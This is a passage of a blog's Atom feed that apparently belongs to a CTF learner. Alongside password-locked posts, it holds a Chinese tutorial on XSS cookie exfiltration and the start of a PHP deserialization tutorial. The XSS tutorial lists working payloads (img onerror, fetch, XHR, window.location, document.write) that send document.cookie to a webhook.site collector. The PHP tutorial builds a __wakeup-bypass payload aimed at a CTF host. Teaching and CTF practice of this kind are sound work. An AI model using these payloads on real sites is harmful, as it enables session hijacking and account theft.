79d58f3feabc16026ebd6213850d6937c10c2c210e0dc0f741cc6b5875a16783d1612991cd8b82851e51ed63ee4fc720d6108a8d90c3a226ce8effb4f741ae167cfffb896f0f4c8901fc22b94658d1b5b06ccad80b0994b70976aed5cbe3ea0816ab094352fef48666d249effb8099898940a4e70dd7f5b55821a92a630e98fb376b79c4bfe2ea0bf5241e45c01ae4f40837cf8e6ece550ed83b769bfc7b56f4e896a581edd7f85d00488119c9db8c14d1eedaabb67839d8abd67f22081f77e168119781f86d57de229e31572d109a493a13f3a9b0582b6d8d4ae93738181e24d2d3b5363fd8354098464de33745622cb2b53ca3151a8456430bf7723eae61d694727edbad966cfa86cba25ac6a66e3bcedb155b450a2a60e94e63e5d6eb597d36fbe1a4262440404178e896b94db8dfa71d242f139fa6ffa9e03dae5c854ebae90e563382382fe8ce7b5fe0df67fdd79bb42fc0a93a47289eba410e4f90859ee821574d62b152af6cd88114089ab8fa4c46a45392222625deee24c95230a0311af22b74aa7997d4a0ae731b6a55104517b401fa0ab12df198a33d0a52ffef18a7b8f2353acd43304734860bbbb9b128c46ebbd67a272c08c31ef27bce7700fa476c2a03e2fc5b62ee96ebb0e197bb0278cd9509baee368fdab80a2916f9b67743904406c140686d254cdf041b90294277a1c027c66f6e47315dc7b91672d2b64b428bb03f2faafeccb841fbe00e28b9fc7ef44675a73d93ea5147148f4de40d2dcd3c4a9c9f2c45e45dc207b538bf8f0a94efee44335c2c2700ffc6079bfb553a7bffe14adf03efa4835cca5ed38143a7bcd5ab794fde4eef55ac3e8dde7e065f641e147655f09fe483ff878c66f526481cfff7e2d85f24313be1f2dcfdb8809a21d003a1cf3b3c5d0b09b4021a1ed4906b3737eb886e8595dd1956461fd42ee47387c7bffa1714f23c3985a5f480f0101bb7fe8a7fcf18a5655965bc61c7c92331fd92dc2cc1359c89e20918f5cbfd80e2029a2a7cd0e867e92954380bdcb713b5385bda47ea1da99e8a47d1390694b6847f76338c1ebb9dfc7a49973c0090023b76421cc78cd393b7b63fb2553d993d55f3b14c63ac6409621476e1498cefaec841d1cad3582161d8d81c4f53ae70bbb5741edcf735e4a423f8a276d8eef77982f6a5ab0e0264419bfeb4054dd41c45337b7c511a4ff7975358ae6475648f7cf5c89caa126b57f920ed407b4484be3a193e04ca367329a43c231492df7f07e7711ae3fac3ba78513c1fb88cb88366e62d9c31ae65bbcafab5b88ef21188a5f4a02d9fa0d08434d0b92d20d297f27d0bfb59c6df2685de5b85cbc8ec84ab543e2e8e88279689af03520471ec0f67092640a602a550e3e105310879fb5c881474b02509d5ba8efa34e7b6cdb850773075b727001734732e535b9186caa1c1adef2d1ee56d63f0de1768889491afa49bfa314a690ad8a402e26013a721d05392e563e46caedc76397c82909126a068c009cc6a17398ebb36dcccc59addc80c2fcb6f131671530367a9b1e5e6c899c9939aaaba63c2b872535d3bc6688269fc06817718d0b9c375d51ed2606d86210afd8800fc31c40f9047777d3d6aaa1e5240dd158ba5302ae619cd2ada9501d18274239f6b20c1b5f4e14641df9056f5f3a4ed0008737f57db1de957962e1f3cc5953a39f0acbd71853d697d330a406e68fe44b03bc81d69f5b9729ab5189d795a0697759002ab8696ece0cf0a850115332c58862c2c5398305b562bd9607c40e8da92b2c3ff9e5bbd56b18074d1c505c134743f426475ae4518890a7c17ee1cf17001a47ab35fd4e8625545e092e4b09f2aa506d74141fd03c4baa496be245f35335f284d8d167e133fab446dcd08ca27f2f5edc6b10b1af6fb547d71b481f1737e4cca4fe29838d663480b20a7c1186b4bc35a1b7adc8501f6fbb487b6a3d5593ef7b5611ee22de5ae9d507387899bb97e643d7d483b0b342dfe11a72abae04b93e40cc904b89c47f9b8f445a14ffeaace249cf1794f9f6195f9c5b64c5d4d8b53b5bb1ae85e04ade8d6a5daa62d0ddb73aec0236bc4d437e16ef92a32599ac48e5dfa40097936c6ef4bfca684fe134f3bdc434983ebd89965fe55855c79f3376c6c80a5918563799d9514a3d4f2b78e3415448c5a101d7d98b4585a56cae3aa17ef1d6db8b0ad46d8edd59eaf997e38778c521a1c757b6a30cdee8b03475a9d946ca4a19635b6a132bf15252f1a78a625abf58e90a699b1e825c8211be71c90eec69f78f8f73822fc5d077bda4e14d9469b0968905d8d5b900b18509c932e95c4b8f3bb0ec5486c2978d837061531f6f761b92022030b6fff316293731efa8ffc7432b1026b4853ffd9b5b3450a531167e22ef14017dba22546f74f0e7670f749dbb6ea987eafbe0b30a9a9155ac93f48b8cff0cfa11f93dd721a95336e2d6d81a9ff5940552da68884ff3697d64cb47792613d02ddd38d8fb2a8b4dbaaae58d62ed91e2b371416cac87a2b95f7ce9902b74b2f0d650e28263e2cf25c8aad7d3076379f6a8a608922593a29bf007e971daa6ac0f1be02934ffeec17feaa99422117f8d072441aa2cfa8ff422baaa3307793d191ba31f49202b5ec1f2240cda76c5fec7910e7008593b59165850c22012c3a7e19f858ba04da9c1f3918837bfc3eae3065e9758c0fa3d5dabc780befa8ac4a40719fbf159437d95769a9dc18e2e27e69a274ea1e99810e5406504cee8047bb4af2b0f7e2802a90d3dac08a94bff9fc6355a9c81aecf88ce4d6fdcc96326220ec52d77f51598c349d53cc87103150edc6eaa8b598326818e43ce99e7d21d97e614e2ccc1ca74980dc0c1fc515df13bd710af1a1f17d3cb9a331d19f6513553cfcd8e1a7e79cc8243bded7fac36ecebe0a233c5e3c96f53fe8e69a398547bed4afc315313b1236dabf2c87bac037d5a48a0fb14a879a140eea155947684916a4d8c17025394663a199b9068a0073abb36c2854001ad3dfc5e9fa0c5249eb97acfdaad99a086e81c3876603e76e3e7399b8748a38823055f88e74a1c92aab12498c4e65844c42d1809edd1570e72f902d391d7d37a026b2f9d8407b9bca12917039fe6a2eea5eac3991ca09eaaaa55d8e9cbb43aa4851aac3629a5522ebb082d538b4cdad09f239bed9c7c23622480d673ebd49ad05a870b3d6bd285bc51b7f3d4d19ef217732b3e7f81855fa77fa28ce441d3f9ab13ac56e67957113b40889e69d030a789dd5eeb637f60f41c9cd86f5e224df39ca6b5d0d0e5aaebec198ee2aa2825fbbf11a60301ddfec489f14f41e69f1f2192e682c79cff3a9433a4fb1ad8f83d0efe62f0bcf6b2f1bbd5c691a9cda80c40e14875a38019ebbdfad6c0b74392446876f68e8f6a1e584464efcb708c018c53303d8b1f48fe1a75c4695a15129df3b5dffaf616674c5b647991261b9e2f7617e32d02525ab54e98ec5bdc07ffe8bfaf8228e0c1dc2bdea9bd47ee97a6f7b28c22eb68ffe434933899fcddecbe020f6904074100a4e272266c4b6e7095c4f7277a0d0c82c8c66c53e854997b93181363bb34e9fbbddb9147cf044c83fcd5129e1f5c8603f306db3623adf6d92559f6fff1fc5e6d6e6bc5495069df4518a567c080e92641b00a440b9bc2ffd331377e32a81ea7f72d0ae9ce4077ebb6ab5c6c4578c019173b71aa794612e061bc3b707a94a5b0c498042c30aa7dab60ba71e007368bec5def1022250c3179f5e1afe5392e478606aa61f63fd2f62a7676b9c32a9a26a1a0c94d48fe7f8179196bb05206f7c31c0309b0ec797dada93b9dcf8d120cefe6bbd28a5cb8f2b8014e924a5e480d120617391de03b6b9db53c78434f3e47062686ea7255a0c5036a2129deae290c4912233415f834b76c76923f6857279ebd68c85c7c153e1d140e14f13df781c27b91039d8b83422be413433b5a39f809d63de30b011a16c1767ae73fb620462df1b47a7b3021f7b6939c9bbb2aa866af8e4497e0a243f55bea2d6150a760190adfc34f1158e8709cdd525444decc9248940dba88d74ecccd951204269dce13c2929f6416b14364215285c833843d7d78352b256241d0a9d19761b08bc14c1e5c34cf58e8b4902c666200f05c9c37b2ba0591f88cfd2bff14cd24ac692cade9b82b01bd3ce02ce2259db72d1ce9b8726b125af39c667b117504aea23dc4f4adcf177cee9dfd6651253fb2b3fcf6dda8f210e7bc1f17f8b324f248f6c3d2e4086a0ce4a3c1e25c3ddcb3129ab5a26789f3b169770e78a9278da7b426e513be1ac1105d57e7dccbd03ef0f090cb9524b8fc7cf095d7d948a116d678015298235351ae1b373ea411b7a0fd8744c5326fd8f9eb1585c60a99ff2204ff08f094cbbd07bebed5efc82ef67cae208f38dbdd69407cc3e7ee6c847ba8b603783d8b2ee4e4f26aa687a74177acff0eeb27daa886db9908038b4b883cca66b86618aa309875ff547b9ed9f7558bbb3fc3f9415079dbe02ff5b7e026f24c3caf72c824c3231606ecafb01768ac4da31d4f582afb48aca0a33dac1d4bcda8f4ddd6b393daf90109b482def8c4d4ce60d505c7c3a2119ff8fcbd1d8d3781ded20a2ca190a4c6eb6c52591eb054c7484111dd26ae4bd868465a4304f21edd7c0b906837cd7fb2ebbcefa55934ac119d34e6721050678cc11e333ada1247fc742404dc0e85e7028440bd9550de87cfeb1c2e59178792789ec675af81431131a6a7720040480d1947ede3897f43279229530f0332de8e266ffc573c209c88222c8bcd3b9c6187667cc36d7dd05ce0ba91bbe30d15f32014485c6cb3c2a63e05546f6ff71b2eff5466748b4845c6fce1af89ac94d2250bee8303350ba01b07448e0fca03881905b2c1da0f363c9af0fda3ca3a9c116984555f3d561d98ce009468124f6269895546c026592551141d6195e220e64e1340c283d5b7928a5f2516926ddf008c9dcdafa5f482cfe083d9d19072121c968cce0ff8d553cd035b58bbbb64232b32f8824dee2044d415b36d11c89c9f39d45ef477c3346f49ba9ed3e823fce31d15e1da1073a1d4ae7d7c9bdd0258378ad4e31364feb0f5e234481d76994447da768fd578d3d8648e05331590763c34aac3cd629c62e608f67950cff6bb9f08c214bcef797deb0cb5f00646be2b2621b3cf58c9ae1d37c6a95529e96534978f93ce9fdfef6af19f32189dbe4bc0335e0c985776a4c21f94be292d87bf81c0b4d2a5427a2f5c913517f5adc7c537f2027e4c1096a1e95fbbee1564a1d98e7e57c499bfdf54bb3ca24fb7eb0caa28df369f666fd373a56e3b8987bc48696029a90d0d4ef64a3b3e38d827c51a3e0fd2ad41ae9dc76cb23f24715736f451cd82d4119fd7411717938a3a2f4730b20336a9525f32ff447686bccb8011a6bd32ea34e4da5dc13858c5f58461d01a6b860b717f257479ed943db4097b174c0085385ef339fdd6f2ca858b0af1a9f14f2861e34044a7cd3acf81acceb8d669ea831cd4a2011c10a791702938aa1de3ac1d41352408f6f1a6f67b356bc7a4a81160b0e5e1fbe8aab2fcafbb938c0d2ac03ce72151cb9bf34c83fb0d8b5dff7f978769d9a24d4a535b3960c30780aee7da1ab2aab267a5be796392998785fe47dd197d7f42b4252290c5a005f9afe97b7b621eda66701e396216cf4f85a5cfdcdf3b2fb30f0b81a4f7e7a5cf52825ba7bae4e9da0a38214a8c9de55cf9668f9226f963c4003c4b9d1e92a755121f8ef8f6206b383d5e9c58e4bcb63ee7b2167b15acd6a2f4588b45cf92e8078d728b127595dd6b043f05a0cd802d8d7152bf3d52c3a30330b4de724c1cc9610a51e330394af4782400295d6906aa0565e95dd251ce88bee3160c76e71c476fca33ed5f240255d2768bc208cf7467acea676087b317130b479b146d50fad5593228918ecca81a250f10ae24cb13c8556ad3f0a266ac8f78ebca3f67ba083ce6745de047741873aa529ff759091897e4acf75ac8b50bd62cd7567d22bbd550645f3bb6b8448f8138308d7922b16484b74e5e13272df67906c7e403b7a1fe28020b8b8a3cfa54a1a9ab868484a7625949937ec901cd45fdfa1f3f287078026c903ec84f602c6a0c296e554968f33518c1b2dfd620034bdd86f3abac84ebc90e0bebc0649e2c8bf368b1ae9eedbe2fad01c606beb080a3addf6cb1623e64231ff04ce20423519a23cc146d8adf9c4d6e0d0b69b31d690fda7b297eb822af3af4cd4992bd32af1add0999736bcf5488f9aa3ced448fdc6839fe014dff75931c96f2b97d49f850ac26bd0586df6d198e0e35af932d12d4b456a07979b58d808914ca7a6f8447463cb559a784b04f2119d0a81af904b524a87cbf9861271f6b09b910a87397402b087b72e623ca568c24c8307ac4783792ea72c95a52ebbf705f3c39f8c78a34799e7cabdbede39b2c9cccba9c55afb87219fd50ac0cad8a6c5c8a67d03393bf1145eb7c010bd8f6fc4c346ec4e735d31ca770533d0770610685b2c0c5ec788fef45f1f5076eeee7f20841954faddcda0a99af5e13236c55984ca19f4baa58f3aad0c00feae600b402549ded479930046594e8744f8f1d57e9951e0f96924bc87554589364b9351c13f897c04aa15acc73813c8e91a26156a7aa3ef2e2c904cbef35c4296fda7174c1c8105597db81a536e55fb92b46a3738f751749a</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">想看也得先输对密码啊(#`O′)</span>      </label>    </div>  </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/10/LFSR%E5%81%9A%E9%A2%98%E6%9C%89%E6%84%9F/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/10/LFSR%E5%81%9A%E9%A2%98%E6%9C%89%E6%84%9F/"/>
    <published>2026-02-10T02:39:21.000Z</published>
    <summary>前面的区域，以后再来探索吧！</summary>
    <title>LFSR做题有感</title>
    <updated>2026-02-10T02:48:18.642Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="php" scheme="https://cl1ck-t0.github.io/tags/php/"/>
    <category term="MYSQL" scheme="https://cl1ck-t0.github.io/tags/MYSQL/"/>
    <content>
      <![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="❌ 密码错误，请重试" data-whm="❌ 文章校验失败">  <script id="hbeData" type="hbeData" data-hmacdigest="71920ad8adca3c7900485e227d1aaf5497b229e46184899bca1cd35b10e01c37">57341c4c03789057d03f16543730f048ce68a62de3d53b991118dab30abb1444b827a13615dba8c66714b784c19622185b29411841d1845cbec2cdabf4d78be2bcb607607fa747db3224166f11696e4199312ddada96bffe868905edb8b6a8cae38ea92f80e72dc652f4997e19a858ce45db80a268952e63fcdbac87d6f4ceecd35f419442fad00a2a6a6af75ab09acaef6d7341102b44d7612f5427068e2975ba12d14843b95a94f50f85e38fc286086255554ec0f2121a651b2ea14ca422d0d14159dedc3cf9359e93b4afe613ab2d3101aa6c0d0400a4d5adac260a8f88f16b2f3fbe01aff87aacfa7cdd4baf5cb6ec172f60a6bc09550de5b6f930ef8e4b6b03a9483791aa0a0744ac162f0c2fa2572f81fbe15d4d6c3f52a4c7a6055bc03c2fd79ca6bd0856d07ee471519dbefb30fca55e4773068afb9de646f9fb13d600d7ae973aabbecf1683c89a4d000adf19c0550043f7f3df76bc44f25be29f82</script>  <div class="hbe hbe-content">    <div class="hbe hbe-input hbe-input-default">      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">        <span class="hbe hbe-input-label-content hbe-input-label-content-default">别看了，我看到你了</span>      </label>    </div>  </div></div><script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/10/phpstuty%E7%9A%84%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8-%E8%87%AA%E7%94%A8/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/10/phpstuty%E7%9A%84%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8-%E8%87%AA%E7%94%A8/"/>
    <published>2026-02-10T02:19:11.000Z</published>
    <summary>这是一篇加密文章哦QAQ，前面的区域，以后再来探索吧。</summary>
    <title>phpstuty的配置和使用(自用)</title>
    <updated>2026-02-18T12:23:52.916Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="xss外带" scheme="https://cl1ck-t0.github.io/tags/xss%E5%A4%96%E5%B8%A6/"/>
    <category term="web安全" scheme="https://cl1ck-t0.github.io/tags/web%E5%AE%89%E5%85%A8/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="xss外带cookie攻击"><a class="markdownIt-Anchor" href="#xss外带cookie攻击"></a> xss外带cookie攻击</h1><p>写在本文之前：本文为小灯自主学习xss外带内容的总结与思考。</p><h2 id="一概念"><a class="markdownIt-Anchor" href="#一概念"></a> 一.概念</h2><p>XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS（跨站脚本攻击）漏洞进行的攻击，攻击者通过在 XSS 攻击中注入恶意脚本，从而<strong>窃取用户的 Cookie 信息</strong>。攻击者通过已有的xss漏洞在浏览器注入恶意代码，并<strong>将受害者的 Cookie 数据上传到攻击者控制的服务器上</strong>，这就是xss外带cookie攻击的核心。</p><h2 id="二攻击姿势"><a class="markdownIt-Anchor" href="#二攻击姿势"></a> 二.攻击姿势</h2><p>xss外带cookie攻击姿势与xss基本无异，区别在于<strong>在使用XSS语句将Cookie外带到攻击者IP地址前，需要在攻击机上起一个http协议，使得目标机能够将Cookie发送给该IP地址</strong>。</p><p>对此，我们小灯可以尝试使用一些CTF常用的Cookie接收平台：</p><ol><li><strong>RequestBin</strong> (<a href="http://requestbin.com">requestbin.com</a>)</li><li><strong>Webhook.site</strong> (webhook.site)</li><li><strong>Beeceptor</strong> (<a href="http://beeceptor.com">beeceptor.com</a>)</li></ol><p>个人常用2，也可使用云服务器来接收cookie或者python进行(可能需要内网穿透)。</p><p>接下来以webhook的临时URL为例简单说明一下xss外带的攻击姿势：</p><p>1.&lt;img 标签</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;document.write(&#x27;&lt;img src=https://webhook.site/9da61079-3b72-49a3-a304-def16d136edb/?c=&#x27;+document.cookie+&#x27;&gt;&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;window.open(&#x27;https://webhook.site/9da61079-3b72-49a3-a304-def16d136edb/?c=&#x27;+document.cookie)&quot;&gt;</span><br></pre></td></tr></table></figure><p>这里提一嘴：</p><p>浏览器的跨域资源共享可能存在限制(CORS),所以有些时候xss外带对自己有效而对目标无效时可能是因为浏览器的安全策略可能阻止了向webhook.site发送数据，这时就要考虑隐蔽点的xss：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=1 onerror=this.src=&#x27;https://webhook.site/9da61079-3b72-49a3-a304-def16d136edb/?&#x27;+document.cookie&gt;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this.src = &#x27;xxx&#x27;</span><br></pre></td></tr></table></figure><p><code>this</code> 指向当前的 <code>&lt;img&gt;</code> 元素本身，</p><p>直接修改这个图片元素的 <code>src</code> 属性，</p><p><strong>这是一个赋值操作，不是新建请求</strong>，更不容易被CORS阻止。</p><h4 id="fetch方法"><a class="markdownIt-Anchor" href="#fetch方法"></a> fetch()方法</h4><p><code>fetch()</code> 允许 JavaScript 发送 HTTP 请求。如果 <code>credentials: 'include'</code>，则可以携带当前站点的 Cookie</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch(&#x27;//webhook.site/xxxxxxxx/?cookie=&#x27;+document.cookie)</span><br></pre></td></tr></table></figure><h4 id="windowopen方法"><a class="markdownIt-Anchor" href="#windowopen方法"></a> window.open方法</h4><p><code>window.open()</code> 是 JavaScript 中用于<strong>打开新窗口或新标签页</strong>的方法。它接受一个 URL 作为参数，返回一个新的浏览器窗口对象或者选项卡对象</p><p>例如，以下代码将会在新窗口或新标签页中打开指定 URL：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">window.open(&quot;//webhook.site/xxxxxxxx/?cookie=&quot;+document.cookie);</span><br></pre></td></tr></table></figure><h4 id="xhr方法"><a class="markdownIt-Anchor" href="#xhr方法"></a> XHR方法</h4><p><code>XMLHttpRequest</code> 是浏览器提供的内建 JavaScript 对象，用于在<strong>不刷新页面的情况下与服务器进行 HTTP 通信</strong>。它是早期 AJAX 技术的核心</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;var xhr = new XMLHttpRequest();</span><br><span class="line">xhr.open(&quot;GET&quot;, &quot;//webhook.site/xxxxxxxx/?cookie=&quot; %2BencodeURIComponent(document.cookie), true);</span><br><span class="line">xhr.send();&lt;/script&gt;</span><br></pre></td></tr></table></figure><h4 id="xmlhttprequest-对象"><a class="markdownIt-Anchor" href="#xmlhttprequest-对象"></a> <code>XMLHttpRequest</code> 对象</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;var xhr = new XMLHttpRequest(); xhr.open(&quot;GET&quot;, &quot;//webhook.site/xxxxxxxx/?cookie=&quot;+document.cookie, true); xhr.send();&lt;/script&gt;</span><br></pre></td></tr></table></figure><h4 id="windowlocation-对象"><a class="markdownIt-Anchor" href="#windowlocation-对象"></a> <code>window.location</code> 对象</h4><p><code>window.location</code> 可以把浏览器重定向到新的页面，此时可通过url携带cookie；使用方法例如</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;window.location=&quot;//webhook.site/xxxxxxxx/?cookie=&quot;+document.cookie;&lt;/script&gt;</span><br></pre></td></tr></table></figure><p>下面是<code>window.location</code> 对象中<strong>可用于跳转的方法</strong></p><h5 id="windowlocationhref"><a class="markdownIt-Anchor" href="#windowlocationhref"></a> <code>window.location.href</code></h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">window.location.href = &quot;//webhook.site/xxxxxxxx/?cookie=&quot;+document.cookie;</span><br></pre></td></tr></table></figure><p><code>window.location.assign(url)</code>、<code>window.location.replace(url)</code>同上</p><h4 id="documentwrite方法"><a class="markdownIt-Anchor" href="#documentwrite方法"></a> <code>document.write</code>方法</h4><p>利用 <code>document.write</code> 写入某些含有src属性的标签，并将Cookie拼接到目标URL中，作为参数发送到指定的 IP 地址和端口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">document.write(`&lt;img src=&quot;//webhook.site/xxxxxxxx/?cookie=$&#123;document.cookie&#125;&quot; &gt;`)</span><br><span class="line">document.write(&#x27;&lt;img src=&quot;//webhook.site/xxxxxxxx/?cookie=&#x27;+document.cookie+&#x27;&quot;/&gt;&#x27;)</span><br></pre></td></tr></table></figure>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/02/09/xss%E5%A4%96%E5%B8%A6cookie%E6%94%BB%E5%87%BB/</id>
    <link href="https://cl1ck-t0.github.io/2026/02/09/xss%E5%A4%96%E5%B8%A6cookie%E6%94%BB%E5%87%BB/"/>
    <published>2026-02-09T07:50:09.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>xss外带cookie攻击</title>
    <updated>2026-02-24T11:58:03.449Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="PHP" scheme="https://cl1ck-t0.github.io/tags/PHP/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="php反序列化漏洞"><a class="markdownIt-Anchor" href="#php反序列化漏洞"></a> PHP反序列化漏洞</h1><p>前言：我写这个的目的主要是由于我在看题时看到了相关内容，处于新手期想要广泛获取知识，想由此激励自己学习php反序列化漏洞的相关知识，并总结学习心得与经验。</p><h3 id="0入坑题攻防世界webunserialize3"><a class="markdownIt-Anchor" href="#0入坑题攻防世界webunserialize3"></a> 0.入坑题：攻防世界web（unserialize3）</h3><p>ps:初见这题时我什么概念都不懂，整道题均由ds老师赞助完成(doge)</p><p>我们先由这道题引出相关内容吧：</p><p>题目给出了这个：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class xctf&#123;</span><br><span class="line">public $flag = &#x27;111&#x27;;</span><br><span class="line">public function __wakeup()&#123;</span><br><span class="line">exit(&#x27;bad requests&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">?code=</span><br></pre></td></tr></table></figure><p>除此之外没有什么东西，对新手来说大概率考的是payload的构造，因此有以下几个步骤：</p><h4 id="第一步理解你的类"><a class="markdownIt-Anchor" href="#第一步理解你的类"></a> 第一步：理解你的类</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">class xctf&#123;</span><br><span class="line">    public $flag = &#x27;111&#x27;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个类有：</p><ul><li>类名：<code>xctf</code>（4个字符）</li><li>一个公有属性：<code>flag</code>，值为 <code>'111'</code></li></ul><h4 id="第二步手动构造序列化字符串"><a class="markdownIt-Anchor" href="#第二步手动构造序列化字符串"></a> 第二步：手动构造序列化字符串</h4><h5 id="a-对象开始部分"><a class="markdownIt-Anchor" href="#a-对象开始部分"></a> A. 对象开始部分</h5><p>对象以 <code>O:</code> 开头：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O:类名长度:&quot;类名&quot;:属性个数:&#123;属性定义&#125;</span><br><span class="line">O:4:&quot;xctf&quot;:1:&#123;</span><br></pre></td></tr></table></figure><ul><li><code>O:</code> 表示对象</li><li><code>4:</code> 类名长度（xctf是4个字符）</li><li><code>&quot;xctf&quot;:</code> 类名</li><li><code>1:</code> 属性个数（这个类有1个属性）</li><li><code>{</code> 开始定义属性</li></ul><h5 id="b-属性定义部分"><a class="markdownIt-Anchor" href="#b-属性定义部分"></a> B. 属性定义部分</h5><p>公有属性的格式：<code>s:属性名长度:&quot;属性名&quot;;类型:值</code></p><p>属性 <code>flag</code> 是公有属性：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s:4:&quot;flag&quot;;s:3:&quot;111&quot;;</span><br></pre></td></tr></table></figure><ul><li><code>s:4:&quot;flag&quot;;</code> 属性名（flag是4个字符）</li><li><code>s:3:&quot;111&quot;;</code> 属性值（111是3个字符的字符串）</li></ul><h5 id="c-闭合"><a class="markdownIt-Anchor" href="#c-闭合"></a> C. 闭合</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="第三步完整序列化字符串"><a class="markdownIt-Anchor" href="#第三步完整序列化字符串"></a> 第三步：完整序列化字符串</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;xctf&quot;:1:&#123;s:4:&quot;flag&quot;;s:3:&quot;111&quot;;&#125;</span><br></pre></td></tr></table></figure><p>而本题之所以能成功，是因为利用了_wakeup()的漏洞，当序列化字符串中的<strong>属性个数大于实际属性个数</strong>时，<code>__wakeup()</code> 不会执行。</p><p>从而构造URL：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://61.147.171.35:61068/?code=O:4:&quot;xctf&quot;:2:&#123;s:4:&quot;flag&quot;;s:3:&quot;111&quot;;&#125;</span><br></pre></td></tr></table></figure><p>进而得到flag。</p><p><strong>小试牛刀后我们可以进一步思考这一方向的学习：</strong></p><p><strong>1.序列化和反序列化究竟是什么？</strong></p><p><strong>2.ds老师说的魔术方法具体是什么？</strong></p><p><strong>3.如何利用漏洞和绕过？</strong></p><p><strong>4.如何解决这些漏洞产生的安全问题？</strong></p><p><strong>带着这些问题我进入了学习：</strong></p><h2 id="一序列化和反序列化"><a class="markdownIt-Anchor" href="#一序列化和反序列化"></a> 一.序列化和反序列化</h2><h3 id="1序列化serialize"><a class="markdownIt-Anchor" href="#1序列化serialize"></a> 1.序列化serialize()</h3><p>序列化是将对象或数组转化为字符串，方便储存，PHP使用serialize()函数将对象序列化，序列化只作用于对象的成员属性，不作用于成员方法(ps:类的内部构成分为成员属性和成员方法，或可称为变量和函数)</p><p>我们来看看序列化的代码：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 